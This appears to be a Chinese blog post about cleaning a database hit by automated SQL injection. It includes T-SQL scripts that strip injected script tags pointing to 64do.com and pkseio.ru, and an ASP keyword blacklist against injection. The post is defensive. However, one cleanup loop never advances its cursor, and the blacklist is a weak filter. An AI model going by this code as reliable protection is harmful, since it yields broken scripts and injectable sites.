接到一個很有挑戰性的任務:一個網站被Google報告有惡意網站,俺的任務就是將這幾行字從Google上抹去!
首先的反應是網頁被嵌入了iframe的惡意腳本,但是仔細檢查後發現並不存在這樣的問題,反而是從Google的診斷上看,數據庫裏的內容比較可疑。
下載下數據庫一看,果然在所有設定長度較大的varchar字段和幾乎所有的ntext字段上,都在最後被掛了諸如:<script scrr='xxx.com></script'>之類的代碼。
問題找到了,但是解決的方法卻是不能接受的,一個個清除惡意代碼的代價太大,不得已,寫了一個遍歷清除垃圾碼的腳本 :
declare c_cursor cursor local for
select a.name, b.name
from sysobjects as a
join syscolumns as b
on a.id = b.id
join systypes as c
on c.xusertype = b.Xtype
where
a.xtype = 'U'and c.name in('ntext','nvarchar','nchar','varchar','char')
declare @tabname sysname,@colname sysname, @trash varchar(100)
select @trash = 'src=http://www.64do.com/script.js'
open c_cursor
fetch next from c_cursor into @tabname,@colname
while @@fetch_status = 0
begin
--print('update cn98003.'+@tabname+' set '+@colname+'=cn98003.f_Clean('+@colname+') '+'where '+@colname+' like '+'''%'+@trash+'%''')
exec('update cn98003.'+@tabname+' set '+@colname+'=replace(replace(convert(varchar(8000),'+@colname+'),''<script src=http://www.64do.com/script.js></script>'',''''),''<script src=http://www.pkseio.ru/script.js></script>'','''') '+'where '+@colname+' like '+'''%'+@trash+'%''')
fetch next from c_cursor into @tabname,@colname
end
close c_cursor
deallocate c_cursor
執行該腳本,可以解決所有varchar類和長度小於8000的text類型的垃圾碼,但是對於長度在 8000以上的ntext字段,由於類型轉換的原因,需要改變方法:
declare @ptrval varbinary(16)
declare ct cursor local for
select articleid from cn98003.cv_product where location like '%64do%'
declare @id int
declare @offset int
open ct
fetch next from ct into @id
while @@fetch_status = 0
begin
select @ptrval=textptr(location) from cn98003.cv_product where articleid = @id
select @offset=patindex('%www.64do%',location) from cn98003.cv_product where articleid = @id
updatetext cn98003.cv_product.location @ptrval @offset NULL ''
end
close ct
deallocate ct
經過處理後還原數據庫,過了兩天後google的惡意網站提醒解除 經過思考,我認爲這種入侵其實是通過自動程序採用窮舉的方法,其原理同樣是sql注入,但是更加兇狠。爲了防止sql注入,在asp網站所有文件include這個網頁:
- '安全檢查設置
- Dim ar_str,ar_qstr,str_index,qstr_index,strlist,strlist1
- strlist = "'|#|exec|insert|select|delete|update|%|chr|char|mid|master|truncate|declare|(|)|*|or|@|and|=|-"
- strlist1 = "exec|insert|select|delete|update|truncate|declare|'"
- If Request.Form <>"" Then
- ar_str = split(strlist1,"|",-1,1)
- For Each qstr_index In Request.Form
- For str_index=0 To Ubound(ar_str)
- If Instr(LCase(Request.Form(qstr_index)),ar_str(str_index)) <>0 Then
- Response.Write " <Script Language=JavaScript>alert('請不要在參數中包含非法字符!');"
- Response.Write " alert('如有問題請與網絡管理員聯繫!');"
- Response.write"javascript:history.go(-1) </SCRIPT>"
- Response.End
- End If
- Next
- Next
- End If
- If Request.QueryString <>"" Then
- ar_str = split(strlist,"|",-1,1)
- For Each qstr_index In Request.QueryString
- For str_index=0 To UBound(ar_str)
- If Instr(1,LCase(Request.QueryString(qstr_index)),ar_str(str_index),1) <>0 Then
- Response.Write " <Script Language=JavaScript>alert('請不要在參數中包含非法字符!');"
- Response.Write " alert('如有問題請與網絡管理員聯繫!');"
- Response.write"javascript:history.go(-1) </SCRIPT>"
- Response.End
- End if
- Next
- Next
- End If